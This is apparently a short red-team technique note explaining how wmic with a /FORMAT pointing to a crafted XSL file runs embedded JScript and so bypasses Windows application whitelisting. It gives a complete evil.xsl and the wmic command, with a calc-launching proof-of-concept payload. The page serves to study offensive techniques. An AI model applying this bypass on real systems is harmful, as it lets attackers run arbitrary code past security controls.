Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo:
{% page-ref page="t1117-regsvr32-aka-squiblydoo.md" %}
Define the XSL file containing the jscript payload:
{% code-tabs %} {% code-tabs-item title="evil.xsl" %}
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc");
]]> </ms:script>
</stylesheet>{% endcode-tabs-item %} {% endcode-tabs %}
Invoke any wmic command now and specify /format pointing to the evil.xsl:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
wmic os get /FORMAT:"evil.xsl"{% endcode-tabs-item %} {% endcode-tabs %}
Calculator is spawned by svchost.exe:
{% embed url="http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html" %}